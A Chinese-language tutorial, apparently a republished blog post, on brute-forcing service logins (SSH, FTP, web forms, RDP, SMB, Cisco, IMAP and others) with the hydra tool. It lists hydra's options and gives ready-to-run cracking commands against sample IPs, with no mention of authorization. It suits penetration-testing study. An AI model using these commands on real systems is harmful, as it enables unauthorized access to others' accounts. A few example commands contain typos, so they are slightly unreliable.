1. 程式人生 > >8.使用hydra對埠進行爆破

8.使用hydra對埠進行爆破

如果對開啟埠的服務不清楚,請看我之前寫的文章:https://www.cnblogs.com/bmjoker/p/8833316.html

2018,網站的防護(sql,xss...)的安全保護也已經上升了一個等級,但是由於管理員的安全意識薄弱,網站弱口令漏洞依然猖獗,不信可以看補天的漏洞提交記錄,弱口令依然是漏洞中的佼佼者,當然弱口令並不僅限於網站的後臺登陸弱口令,還有埠,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389遠端登陸,8080中介軟體Tomcat,7001中介軟體Weblogic,3306 Mysql資料庫(phpmyadmin),1433 SQLServer資料庫,5432 Postgresql資料庫...

埠掃描不用多講,鄙人還是覺得nmap好一點,但是如何批量掃的話,丟包率可能高一點。

對於埠的爆破,首先要有一個好的字典,然後再有一個好的工具,工具的話,python指令碼,超級弱口令檢測工具....這裡主要介紹kali裡面hydra的爆破,應為hydra支援幾乎所有協議的線上密碼破解,並且容錯率好,不過能不能爆破成功還是需要你有一個好的字典。

---------------------------------------------------------------

語法:

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

引數詳解:

-R   根據上一次進度繼續破解
-S   使用SSL協議連線
-s   指定埠
-l   指定使用者名稱
-L   指定使用者名稱字典(檔案)
-p   指定密碼破解
-P   指定密碼字典(檔案)
-e   空密碼探測和指定使用者密碼探測(ns)
-M <FILE>指定目標列表檔案一行一條
-f 在使用-M引數以後,找到第一對登入名或者密碼的時候中止破解。 -C 使用者名稱可以用:分割(username:password)可以代替-l username -p password -o <FILE>輸出檔案 -t 指定多執行緒數量,預設為16個執行緒
-w TIME 設定最大超時的時間,單位秒,預設是30s -vV 顯示詳細過程 server 目標IP service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

爆破 ssh:22 埠命令:

hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh

爆破 Ftp:21 埠命令(指定使用者名稱為root)

hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp

get方式提交,破解web登入(指定使用者名稱為admin)

hydra -L user.txt -p password.txt -t 執行緒 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 執行緒 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登入:

hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

引數說明:-t同時執行緒數3,-l使用者名稱是admin,字典pass.txt,儲存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回資訊提示。

破解https:

hydra -m /index.php -l admin -P password.txt 192.168.0.132 https

破解teamspeak:

hydra -l admin -P passworrd.txt -s 埠號 -vV 192.168.0.132 teamspeak

破解cisco:

hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable

破解smb:

hydra -l administrator -P password.txt 192.168.0.132 smb

破解pop3:

hydra -l root -P password.txt my.pop3.mail pop3

破解rdp(3389埠):

hydra 192.168.0.132 rdp -l administrator -P password.txt -V

破解http-proxy:

hydra -l admin -P passwprd.txt http-proxy://192.168.0.132

破解imap:

hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

 

就先介紹到這裡~~~